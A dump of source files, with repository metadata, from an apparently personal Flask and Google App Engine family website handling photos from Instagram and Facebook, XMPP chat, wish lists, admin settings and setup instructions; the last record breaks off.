"text": "import datetime\n\nfrom google.appengine.ext import ndb\n\n\nclass Photo(ndb.Model):\n link = ndb.StringProperty()\n created_time = ndb.DateTimeProperty()\n thumbnail = ndb.StringProperty()\n source = ndb.StringProperty()\n likes_count = ndb.IntegerProperty()\n comments_count = ndb.IntegerProperty()\n caption = ndb.StringProperty()\n user_name = ndb.StringProperty()\n\n @classmethod\n def from_instagram_photo(cls, photo):\n return cls(\n link=photo['link'],\n created_time=datetime.datetime.fromtimestamp(int(photo['created_time'])),\n thumbnail=photo['images']['thumbnail']['url'],\n source=photo['images']['standard_resolution']['url'],\n likes_count=photo['likes']['count'],\n comments_count=photo['comments']['count'],\n caption=photo['caption']['text'] if photo['caption'] else None,\n user_name=photo['user']['full_name'],\n )\n\n @classmethod\n def from_facebook_photo(cls, photo):\n return cls(\n link=photo['link'],\n created_time=datetime.datetime.strptime(photo['created_time'], \"%Y-%m-%dT%H:%M:%S+0000\"),\n thumbnail=photo['picture'],\n source=photo['source'],\n likes_count=len(photo.get('likes', {'data': []})['data']),\n comments_count=len(photo.get('comments', {'data': []})['data']),\n caption=getattr(photo, 'name', None),\n user_name=photo['from']['name'],\n )\n"
},
{
"alpha_fraction": 0.6106870174407959,
"alphanum_fraction": 0.6106870174407959,
"avg_line_length": 22.81818199157715,
"blob_id": "4e2d5da1605b4704db2bfb6f8696a16815670d1b",
"content_id": "a62a3f1ca1da0ddb7cabb9deaf4340127f197a5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 262,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 11,
"path": "/family/config.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import os\n\n\ndef setup_config(app):\n config = app.config\n\n config['SECRET_KEY'] = app.settings.get('secret.key')\n if 'localhost' in os.environ.get('SERVER_NAME', ''):\n config['DEBUG'] = True\n else:\n config['TRAP_HTTP_EXCEPTIONS'] = True\n"
},
{
"alpha_fraction": 0.4603658616542816,
"alphanum_fraction": 0.4672256112098694,
"avg_line_length": 38.75757598876953,
"blob_id": "ed568a4009ab55cb2d00d30afea9bcfdb6bb6daf",
"content_id": "7ddb1d36cb4b711f8735cded787fa2ec3c372049",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1313,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 33,
"path": "/family/templates/home.html",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "{% extends 'layout.html' %}\n\n{% block body %}\n {% if not settings_initialized %}\n <div class=\"alert alert-warning\">\n Your site has not been set up yet. <a href=\"{{ url_for('setup_wizard') }}\">Set it up now.</a>\n </div>\n {% endif %}\n <div class=\"jumbotron jumbotron-home\">\n <h1>\n Hello, family!\n </h1>\n <p>\n This is the {{ settings.get('site.name') }}. We hope you find it useful and informative.\n </p>\n {% if birthday_reminders %}\n {% for reminder in birthday_reminders %}\n {% if reminder[1] == 0 %}\n <div class=\"alert alert-success\">\n Today is {{ reminder[0] }}'s birthday! Try to wish this person a Happy Birthday today if you get a chance...\n </div>\n {% else %}\n <div class=\"alert alert-info\">\n {{ reminder[0] }}'s birthday is coming up in {{ reminder[1] }} day{% if reminder[1] > 1 %}s{% endif %}.\n </div>\n {% endif %}\n {% endfor %}\n {% endif %}\n <p>\n <a class=\"btn btn-primary btn-large btn-padding\" href=\"{{ url_for('messages') }}\">View message board »</a>\n </p>\n </div>\n{% endblock body %}\n"
},
{
"alpha_fraction": 0.6804872155189514,
"alphanum_fraction": 0.6898571252822876,
"avg_line_length": 31.09774398803711,
"blob_id": "6148294c0da3b9b0d1f053f18da1c8b79c9a61de",
"content_id": "67536ca4faebc57a4280cdc5dfa3ca2880471084",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4269,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 133,
"path": "/family/views/chat.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import datetime\n\nfrom google.appengine.api import xmpp\nfrom google.appengine.ext import ndb\nfrom werkzeug.exceptions import NotFound\nfrom flask import request, render_template, jsonify, g\nfrom family.decorators import requires_login\nfrom family.models.chat import ChatSubscriber, ChatMessage\nfrom family import app\n\n\n\"\"\"\nTODO:\nConsider sending a (self) presence message to all chat subscribers when the app starts up, and\non a shutdown hook, send a presence of unavailable\n\"\"\"\n\n\[email protected]('/_ah/xmpp/presence/available/', methods=['POST'])\ndef xmpp_subscriber_available():\n \"\"\" Called when a user comes online\n \"\"\"\n from_address = request.form.get('from')\n key = ndb.Key(ChatSubscriber, from_address)\n subscriber = key.get()\n if subscriber:\n subscriber.is_online = True\n subscriber.put()\n return '', 200\n return NotFound()\n\n\[email protected]('/_ah/xmpp/presence/unavailable/', methods=['POST'])\ndef xmpp_subscriber_unavailable():\n \"\"\" Called when a user goes offline\n \"\"\"\n from_address = request.form.get('from')\n key = ndb.Key(ChatSubscriber, from_address)\n subscriber = key.get()\n if subscriber:\n subscriber.is_online = False\n subscriber.put()\n return '', 200\n return NotFound()\n\n\[email protected]('/_ah/xmpp/presence/probe/', methods=['POST'])\ndef xmpp_subscriber_probe():\n \"\"\" Called when someone requests to see if the main website chat user is online\n \"\"\"\n return '', 200\n\n\n# 1) Member visits the chat page\[email protected]('/chat', methods=['GET'])\n@requires_login\ndef chat():\n # 1a) Request online status of each subscriber\n for subscriber in ChatSubscriber.query():\n xmpp.send_presence(subscriber, presence_type=xmpp.PRESENCE_TYPE_PROBE)\n return render_template('chat.html')\n\n\n# 2) Asynchronously request all chat messages\[email protected]('/chat/messages', methods=['GET'])\n@requires_login\ndef chat_messages():\n cutoff = datetime.datetime.now() - datetime.timedelta(weeks=4)\n results = ChatMessage.query(ChatMessage.posted_date > cutoff).order(ChatMessage.posted_date)\n messages = [{'sender': m.sender, 'body': m.body, 'date': m.humanized_posted_date} for m in results]\n return jsonify({'messages': messages})\n\n\n# 3) Asynchronously request all subscribers (including their online status)\[email protected]('/chat/subscribers', methods=['GET'])\n@requires_login\ndef chat_subscribers():\n subscribers = [{'name': s.key.id(), 'status': 'online' if s.is_online else 'offline'}\n for s in ChatSubscriber.query()]\n return jsonify({'subscribers': subscribers})\n\n\n# 4) Member clicks a link to send a chat invitation out to himself\[email protected]('/chat/invite', methods=['GET'])\n@requires_login\ndef send_invite():\n # 4a) The chat service sends an invite to the XMPP user\n xmpp.send_invite(request.args['to'])\n return '', 200\n\n\n# 5) A site member posts a message to the chat server\[email protected]('/_ah/xmpp/subscription/subscribed/', methods=['POST'])\ndef xmpp_subscribed():\n # 5a) We add him to the list of chat subscribers\n jid = request.form['from'].split('/')[0]\n ChatSubscriber.add_subscriber(jid)\n return '', 200\n\n\n# 6) This is called when the user accepts the invite using his XMPP (Gtalk) chat client\[email protected]('/chat/send', methods=['POST'])\n@requires_login\ndef chat_send():\n # 5a) We only send the message to the main site XMPP user\n from_jid = '%[email protected]' % g.member.first_name\n message = request.json['message']\n if message:\n xmpp.send_message('[email protected]', message, from_jid=from_jid)\n return '', 200\n\n\n# 7) This is called when the message is received by the site XMPP user\[email protected]('/_ah/xmpp/message/chat/', methods=['POST'])\ndef xmpp_receive_message():\n message = xmpp.Message(request.form)\n\n # 6a) Write the message to the database\n ChatMessage.save_message(message.sender, message.body)\n\n # 6b) Broadcast the message to all chat subscribers\n for subscriber in ChatSubscriber.query():\n xmpp.send_message(subscriber.key.id(), message)\n return '', 200\n\n\n# 8) The user decides to unsubscribe from the chat\[email protected]('/chat/remove', methods=['POST'])\n@requires_login\ndef chat_remove():\n jid = request.form['subscriber']\n ChatSubscriber.remove_subscriber(jid)\n return '', 200\n"
},
{
"alpha_fraction": 0.7379454970359802,
"alphanum_fraction": 0.75262051820755,
"avg_line_length": 29.774192810058594,
"blob_id": "8f0ad4484c61845ac6214d72caa9705cacb8fd32",
"content_id": "a0fa37453689db87ac166eb73ad0a0974e99023c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1908,
"license_type": "no_license",
"max_line_length": 286,
"num_lines": 62,
"path": "/README.md",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "# My family website\n\nThis is probably not interesting to anyone other than me\n\nThe technologies in use are:\n\n* Python\n* Flask\n* Google App Engine\n\n## Set up instructions\n\n*Note: As with most development projects, it'll be easier to run this on either Linux or a Mac. If you have Windows, I recommend running Ubuntu inside a virtual machine.*\n\n1. Install Python 2.7 and pip\n\t* I highly recommend installing virtualenv and virtualenvwrapper too\n\t\n2. Install Google App Engine SDK\n\t* https://developers.google.com/appengine/downloads\n\t\n3. Go to your top-level projects folder (where you want this to live) and type:\n```\ngit clone https://github.com/trungly/thelyfamily.git\ncd thelyfamily\n```\t\n\n3.5. In MacOS 10.9.1, you would need to edit the bashrc file to include the correct path to virtualenvwrapper in order to go to step 4. Add the following to your bashrc file (mine's located in /etc/). Please change the location of virtualenvwrapper to the location on your computer. \n\nnano ~/.bashrc\nexport WORKON_HOME=$HOME/.virtualenvs\nsource /Library/Frameworks/Python.framework/Versions/2.7/bin/virtualenvwrapper$\n\nAfter appending to bashrc, reload with:\nsource ~/.bashrc\n\n4. Create your virtual environment here\n```\nmkvirtualenv thelyfamily\n```\n\n5. Install the Python package called PIL (Python Image Library). On Mac, it is called pillow, so the command would be:\n```\npip install pillow\n```\t\n\t*Note: PIL is only needed locally for manipulating images; Google App Engine takes care of this for us on the production server.*\n\t\n6. Install the rest of the python packages from requirements.txt into the server/lib directory by doing this:\n```\npip install -r requirements.txt -t server/lib\n```\t\n\n7. Run the server\n```\ndev_appserver.py .\n```\t\n\n8. In your web browser, go to:\n```\nlocalhost:8080\n```\t\n\n9. You can go to `http://localhost:8000` if you want to mess with things like viewing the Datastore (database)\n"
},
{
"alpha_fraction": 0.441433310508728,
"alphanum_fraction": 0.44384220242500305,
"avg_line_length": 33.59375,
"blob_id": "1d6c4c5c06c01a08d86ac51377181366065a9de8",
"content_id": "639fbff0a6b3ce855bfc5c7cc660be34cc59a676",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3321,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 96,
"path": "/static/js/lists.js",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "angular.module('underscore', []).factory('_', function() {\n return window._;\n});\n\nangular.module('ListsApp', ['underscore', 'ui.sortable', 'ngResource'])\n .factory('Lists', function($resource) {\n return $resource('/api/lists/:id', {}, {'query': {method: 'GET', isArray: false }});\n })\n .controller('ListCtrl', ['$scope', 'Lists', '_', function($scope, Lists, _) {\n/*\n $scope.lists = [\n {\n id: 1,\n name: 'Todo'\n },\n {\n id: 2,\n name: 'Shopping',\n items: [\n 'eggs',\n 'bacon'\n ]\n }\n ];\n*/\n //$scope.lists = Lists.query();\n Lists.query(function (resource) {\n $scope.lists = resource.data;\n });\n\n $scope.activeListId = null;\n $scope.setActiveList = function(id) {\n if (id !== $scope.activeListId) {\n $scope.activeListId = id;\n $scope.newItem = '';\n $scope.$broadcast('newListSelected');\n }\n };\n $scope.activeList = function() {\n if (!$scope.activeListId) { return {}; }\n var result = $scope.lists.filter(function(element) {\n return element.id === $scope.activeListId;\n });\n return result.length ? result[0] : {};\n };\n $scope.sortableOptions = {\n additionalPlaceholderClass: 'dragged-item'\n };\n\n $scope.addItemOnEnter = function(event) {\n if (event.keyCode === 13) {\n var newItem = event.currentTarget.value;\n if (newItem) {\n var items = $scope.activeList().items;\n if (items) {\n items.push(newItem);\n } else {\n $scope.activeList().items = [newItem];\n }\n }\n // clear out the preview line\n this.newItem = ''; // 'this' is the current child scope\n }\n };\n $scope.ctrlClickDeleteItem = function(event) {\n if (event.ctrlKey || event.metaKey) {\n $scope.activeList().items = _.without($scope.activeList().items, this.item);\n }\n };\n\n $scope.createNewList = function() {\n var latestList = _.max($scope.lists, function(list){ return list.id; });\n $scope.lists.push({\n id: latestList.id + 1,\n name: 'New List'\n });\n $scope.setActiveList(latestList.id + 1);\n };\n $scope.deleteActiveList = function() {\n $scope.lists = _.reject($scope.lists, function(list){ return list.id === $scope.activeListId; });\n $scope.activeListId = 0;\n }\n }])\n .directive('focusOn', function($timeout) {\n return {\n restrict: 'A',\n link: function(scope, element, attrs) {\n scope.$on(attrs['focusOn'], function() {\n $timeout(function() { // wait till DOM renders the element\n element.focus();\n scope.newItem = ''; // clear the newItem model too\n })\n });\n }\n }\n });\n"
},
{
"alpha_fraction": 0.7202970385551453,
"alphanum_fraction": 0.7227723002433777,
"avg_line_length": 22.764705657958984,
"blob_id": "5351eb3860baa6b7910e7912632d0508a5001164",
"content_id": "4feff7e0352c768ecfb48a930067de6a023dd54c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 404,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 17,
"path": "/family/models/list.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from markdown2 import markdown\nfrom google.appengine.ext import ndb\nfrom family.models.member import Member\nfrom family.utils import pretty_date\n\n\nclass Item(ndb.Model):\n \"\"\" Represents an item on a list \"\"\"\n\n name = ndb.TextProperty()\n\n\nclass List(ndb.Model):\n \"\"\" Represents a list that contains items \"\"\"\n\n name = ndb.TextProperty()\n items = ndb.StructuredProperty(Item, repeated=True)\n"
},
{
"alpha_fraction": 0.6865671873092651,
"alphanum_fraction": 0.7574626803398132,
"avg_line_length": 32.5,
"blob_id": "c2340f490e69ca19f97eb6c3e880ff69fa7164e2",
"content_id": "01e2a147cba092b19020104c205c24ff723761c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 268,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 8,
"path": "/requirements.txt",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "# This requirements file lists all dependencies for this project.\n# Run 'pip install -r requirements.txt -t server/lib' to install these dependencies\n# in this project's server/lib directory.\nFlask==1.0\nFlask-WTF==0.10.3\nrequests==2.20.0\nmarkdown2==2.3.8\npytz==2016.4\n"
},
{
"alpha_fraction": 0.6945876479148865,
"alphanum_fraction": 0.7139175534248352,
"avg_line_length": 30.040000915527344,
"blob_id": "67e815ee8716164e1d4a201b01b313509bab6c0f",
"content_id": "8f3e525b63eb980139234838087c31cb28b4c879",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 776,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 25,
"path": "/family/views/error.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import sys\nimport traceback\n\nfrom flask import render_template\nfrom family import app\n\n\nERROR_MESSAGES = {\n 403: 'Tsk Tsk. You shouldn\\'t be here.',\n 404: 'Huh? That page doesn\\'t even exist.',\n 500: 'Dang. Something broke.'\n}\n\n\ndef catchall_error_handler(error):\n error.code = getattr(error, 'code', 500) # default uncaught errors to HTTP 500 error\n error.description = getattr(error, 'description', 'An uncaught error has occurred.')\n error.message = ERROR_MESSAGES.get(error.code, 'Congrats! You found an unknown error.')\n error.stacktrace = traceback.format_exception(*sys.exc_info())\n\n return render_template('error.html', error=error), error.code\n\n\nfor code in ERROR_MESSAGES.keys():\n app.register_error_handler(code, catchall_error_handler)\n"
},
{
"alpha_fraction": 0.620192289352417,
"alphanum_fraction": 0.621082603931427,
"avg_line_length": 35.70588302612305,
"blob_id": "02a7cd04d14af9c7bb82ae29b9b903a9a6309047",
"content_id": "097356a1c36e81e2f8943da38a1c03797db42386",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5616,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 153,
"path": "/family/views/photos.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import cgi\nimport datetime\nimport requests\n\nfrom google.appengine.ext import blobstore\nfrom flask import current_app, request, g, redirect, url_for, flash, render_template\nfrom family import app\nfrom family.decorators import requires_login\nfrom family.facebook import Facebook\nfrom family.models.photo import Photo\nfrom family.models.instagram import InstagramUser\nfrom family.models.facebook import FacebookUser\n\n\[email protected]('/profile/photo', methods=['POST'])\n@requires_login\ndef profile_photo():\n _, params = cgi.parse_header(request.files['profile_photo'].headers['Content-Type'])\n profile = g.member.profile\n profile.photo_key = blobstore.BlobKey(params['blob-key'])\n profile.put()\n return redirect(url_for('profile'))\n\n\[email protected]('/profile/photo/delete', methods=['POST'])\n@requires_login\ndef profile_photo_delete():\n profile = g.member.profile\n photo_key = profile.photo_key\n blobstore.delete(photo_key)\n profile.photo_key = None\n profile.put()\n return '', 200\n\n\[email protected]('/photos')\n@requires_login\ndef photos():\n all_photos = []\n for user in (InstagramUser.query().fetch()):\n response = requests.get(user.recent_photos_url)\n if response.ok:\n current_user_photos = response.json().get('data', None)\n current_user_photos = [Photo.from_instagram_photo(p) for p in current_user_photos]\n if current_user_photos:\n all_photos = all_photos + current_user_photos\n\n for user in (FacebookUser.query().fetch()):\n response = requests.get(user.recent_photos_url)\n if response.ok:\n current_user_photos = response.json().get('data', None)\n current_user_photos = [Photo.from_facebook_photo(p) for p in current_user_photos]\n if current_user_photos:\n all_photos = all_photos + current_user_photos\n\n return render_template('photos.html', photos=sorted(all_photos, key=lambda x: x.created_time, reverse=True))\n\n\[email protected]('/photos/return')\ndef instagram_return():\n \"\"\" handle return from Instagram Authentication\n \"\"\"\n client_id = current_app.settings.get('instagram.client.id')\n client_secret = current_app.settings.get('instagram.client.secret')\n\n code = request.args.get('code', None)\n error = request.args.get('error', None)\n\n if error:\n flash('There was a problem with Instagram authentication.', 'danger')\n else:\n # This is case we are coming back from a successful Instagram Auth call\n url = 'https://api.instagram.com/oauth/access_token'\n payload = {\n 'client_id': client_id,\n 'client_secret': client_secret,\n 'grant_type': 'authorization_code',\n 'redirect_uri': 'http://%s/photos/return' % current_app.settings.get('host.name'),\n 'code': code,\n }\n response = requests.post(url, data=payload)\n result = response.json()\n user = result.get('user', None)\n\n if user:\n instagram_user = g.member.instagram_user\n instagram_user.populate(\n userid=user['id'],\n access_token=result['access_token'],\n username=user['username'],\n full_name=user['full_name'],\n profile_picture=user['profile_picture'],\n website=user['website'],\n bio=user['bio'],\n )\n instagram_user.put()\n else:\n flash('There was a problem with Instagram authentication. No user object found.', 'danger')\n\n return redirect(url_for('photos'))\n\n\[email protected]('/instagram/disconnect')\ndef instagram_disconnect():\n if g.member.instagram_user_key:\n g.member.instagram_user_key.delete()\n g.member.instagram_user_key = None\n g.member.put()\n flash('Successfully disconnected your Instagram account', 'success')\n return redirect(url_for('profile', _anchor=\"connect-accounts\"))\n\n\[email protected]('/facebook/disconnect')\ndef facebook_disconnect():\n if g.member.facebook_user_key:\n g.member.facebook_user_key.delete()\n g.member.facebook_user_key = None\n g.member.put()\n flash('Successfully disconnected your Facebook account', 'success')\n return redirect(url_for('profile', _anchor=\"connect-accounts\"))\n\n\[email protected]('/facebook/return')\ndef facebook_return():\n code = request.args.get('code', None)\n if code:\n url = Facebook.access_token_url(code)\n response = requests.get(url)\n if response.ok:\n access_token = response.content.split('&')[0].split('=')[1]\n url = Facebook.debug_token_url(access_token)\n\n response = requests.get(url)\n if response.ok:\n data = response.json()['data']\n facebook_user = g.member.facebook_user\n facebook_user.populate(\n userid=data['user_id'],\n access_token=access_token,\n expires_at=datetime.datetime.fromtimestamp(data['expires_at']),\n scopes=data['scopes'],\n )\n facebook_user.put()\n else:\n flash('There was a problem with verifying access_token: ' + response.json()['error']['message'],\n 'danger')\n else:\n flash('There was a problem with retrieving access_token: ' + response.content, 'danger')\n else:\n flash('There was a problem with Facebook authentication: No code.', 'danger')\n\n flash('Successfully connected your account!', 'success')\n return redirect('%s#connect-accounts' % url_for('profile'))\n"
},
{
"alpha_fraction": 0.5645719766616821,
"alphanum_fraction": 0.5893121957778931,
"avg_line_length": 30.092308044433594,
"blob_id": "b9f4ab172149197536012c2859dfa9550045d768",
"content_id": "ba940ae770e7a2d351d9077c8f36d7005931c074",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2021,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 65,
"path": "/family/utils.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from flask.json import JSONEncoder\nfrom datetime import datetime, date, time\nfrom google.appengine.ext import ndb\n\n\n# From: http://stackoverflow.com/questions/1551382/user-friendly-time-format-in-python\n# TODO: convert to a Jinja2 filter\n\n\ndef pretty_date(time=False):\n \"\"\"\n Get a datetime object or a int() Epoch timestamp and return a\n pretty string like 'an hour ago', 'Yesterday', '3 months ago',\n 'just now', etc\n \"\"\"\n from datetime import datetime\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time,datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(second_diff) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str( second_diff / 60 ) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str( second_diff / 3600 ) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(day_diff/7) + \" weeks ago\"\n if day_diff < 365:\n return str(day_diff/30) + \" months ago\"\n return str(day_diff/365) + \" years ago\"\n\n\nclass NDBModelJSONEncoder(JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj, ndb.Key):\n return obj.id()\n elif isinstance(obj, ndb.Model):\n # call model's to_dict() and tack on the id as well\n return dict(obj.to_dict(), **dict(id=obj.key.id()))\n elif isinstance(obj, (datetime, date, time)):\n return str(obj) # todo: make sure this is what we want\n\n return JSONEncoder.default(self, obj)\n"
},
{
"alpha_fraction": 0.6231883764266968,
"alphanum_fraction": 0.6231883764266968,
"avg_line_length": 28.571428298950195,
"blob_id": "8de256fcf59d94e1c4a0cf196c037e861262ad20",
"content_id": "8df66111808f9aac7d310d1df2f3badcdc000d7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 414,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 14,
"path": "/family/decorators.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from functools import wraps\nfrom flask import g, flash, redirect, url_for\n\n\ndef requires_login(func):\n @wraps(func)\n def decorator(*args, **kwargs):\n if hasattr(g, 'member') and g.member:\n return func(*args, **kwargs)\n else:\n flash('You will need to log in before you can access this website', 'warning')\n return redirect(url_for('home'))\n\n return decorator\n"
},
{
"alpha_fraction": 0.6473922729492188,
"alphanum_fraction": 0.6473922729492188,
"avg_line_length": 31.66666603088379,
"blob_id": "3c8d8e37e91c13872972bacef8a82db5ebb1175f",
"content_id": "ec08aa2638e250a64faea5404f6f5677b70181d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 882,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 27,
"path": "/family/models/wishlist.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from google.appengine.ext import ndb\n\n\nclass WishlistItem(ndb.Model):\n \"\"\" Represents an item on a user's wish list \"\"\"\n\n name = ndb.StringProperty(required=True)\n link = ndb.StringProperty()\n details = ndb.StringProperty()\n is_giver_anonymous = ndb.BooleanProperty(default=True)\n status = ndb.StringProperty(required=True, default='open')\n created_date = ndb.DateTimeProperty()\n\n owner_key = ndb.KeyProperty(kind='Member')\n giver_key = ndb.KeyProperty(kind='Member')\n\n @property\n def giver(self):\n return self.giver_key.get() if self.giver_key else None\n\n def update_status(self, status, member_key):\n self.status = status\n if status == 'open':\n self.giver_key = None # clear it out if it's open\n elif status == 'reserved' or status == 'locked':\n self.giver_key = member_key\n self.put()\n"
},
{
"alpha_fraction": 0.7112188339233398,
"alphanum_fraction": 0.7153739333152771,
"avg_line_length": 27.3137264251709,
"blob_id": "6b7be5d23d5db22b266862e0c7f8a9b7ae6a43fd",
"content_id": "1395b3687ec92972f8119d2c00d8ad2fbe45f8b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1444,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 51,
"path": "/family/views/admin.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import yaml\n\nfrom flask import render_template, jsonify, request, make_response\nfrom family import app\nfrom family.decorators import requires_login\nfrom family.models.member import Member\n\n\[email protected]('/admin', methods=['GET'])\n@requires_login\ndef admin():\n return render_template('admin.html')\n\n\[email protected]('/admin/settings', methods=['GET'])\n@requires_login\ndef all_settings():\n return jsonify({'settings': app.settings.get_all(as_name_value_list=True)})\n\n\[email protected]('/admin/settings/update', methods=['POST'])\n@requires_login\ndef update_settings():\n app.settings.set_all(request.json['settings'])\n return '', 200\n\n\[email protected]('/admin/settings/reset', methods=['GET'])\n@requires_login\ndef reset_settings():\n app.settings.set('settings.initialized', False)\n from family.settings import SiteSettings\n app.settings = SiteSettings(app)\n return '', 200\n\n\[email protected]('/admin/members', methods=['GET'])\n@requires_login\ndef all_members():\n members = Member.query().fetch()\n serialized_members = [m.to_dict(exclude=['profile_key']) for m in members]\n return jsonify({'members': serialized_members})\n\n\[email protected]('/admin/settings/export', methods=['GET'])\n@requires_login\ndef admin_export_settings():\n settings = app.settings.as_yaml()\n response = make_response(yaml.dump(settings, default_flow_style=False))\n response.headers[\"Content-Disposition\"] = \"attachment; filename=settings.yaml\"\n return response\n"
},
{
"alpha_fraction": 0.6544342637062073,
"alphanum_fraction": 0.6544342637062073,
"avg_line_length": 44.41666793823242,
"blob_id": "8dc53bfd9f129eee908798dbde95c128a48c3bd1",
"content_id": "775d8e534a97a7f1a4324b95a264cad01ec9577d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1635,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 36,
"path": "/family/facebook.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from flask import current_app\n\n\nclass Facebook(object):\n\n @staticmethod\n def access_token_url(code):\n url = 'https://graph.facebook.com/oauth/access_token?client_id={app_id}&redirect_uri={redirect_uri}&client_secret={app_secret}&code={code}'.format(\n app_id=current_app.settings.get('facebook.app.id'),\n redirect_uri='http://%s/facebook/return' % current_app.settings.get('host.name'),\n app_secret=current_app.settings.get('facebook.app.secret'),\n code=code\n )\n return url\n\n @staticmethod\n def debug_token_url(access_token):\n \"\"\" Facebook's auth API's are really confusing. This one is called 'Inspect access tokens' in the docs:\n https://developers.facebook.com/docs/facebook-login/manually-build-a-login-flow/#confirm\n In this one, input_token is the token you're inspecting (which was the user's access_token previously).\n And here, access_token is the site's access token.\n We're mainly using it to get to the user's userid in order to store in the database\n \"\"\"\n url = 'https://graph.facebook.com/debug_token?input_token={input_token}&access_token={access_token}'.format(\n input_token=access_token,\n access_token=current_app.settings.get('facebook.access.token')\n )\n return url\n\n @staticmethod\n def uploaded_photos_url(facebook_user):\n url = 'https://graph.facebook.com/{userid}/photos/uploaded?access_token={access_token}'.format(\n userid=facebook_user.userid,\n access_token=facebook_user.access_token,\n )\n return url\n"
},
{
"alpha_fraction": 0.7369668483734131,
"alphanum_fraction": 0.7393364906311035,
"avg_line_length": 31.461538314819336,
"blob_id": "704ffdab1e624fb34603676e8c65bfed8377ea0c",
"content_id": "b719eaf40aabbca1278e613d1bb2d96e6795ac96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 13,
"path": "/appengine_config.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\n# required to load libraries under server/lib that Flask depends on\napp_root_dir = os.path.dirname(__file__)\nserver_lib_dir = os.path.join(app_root_dir, 'server/lib')\nif server_lib_dir not in sys.path:\n sys.path.insert(0, server_lib_dir)\n\n# def webapp_add_wsgi_middleware(app):\n# from google.appengine.ext.appstats import recording\n# app = recording.appstats_wsgi_middleware(app)\n# return app\n"
},
{
"alpha_fraction": 0.6885592937469482,
"alphanum_fraction": 0.6885592937469482,
"avg_line_length": 30.46666717529297,
"blob_id": "fb14c5537594d4ba56a6b40b454f6a50f81d17e6",
"content_id": "b7fb9ac10c50a41ad029bc34e75cbbc32d6364bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 944,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 30,
"path": "/family/models/chat.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
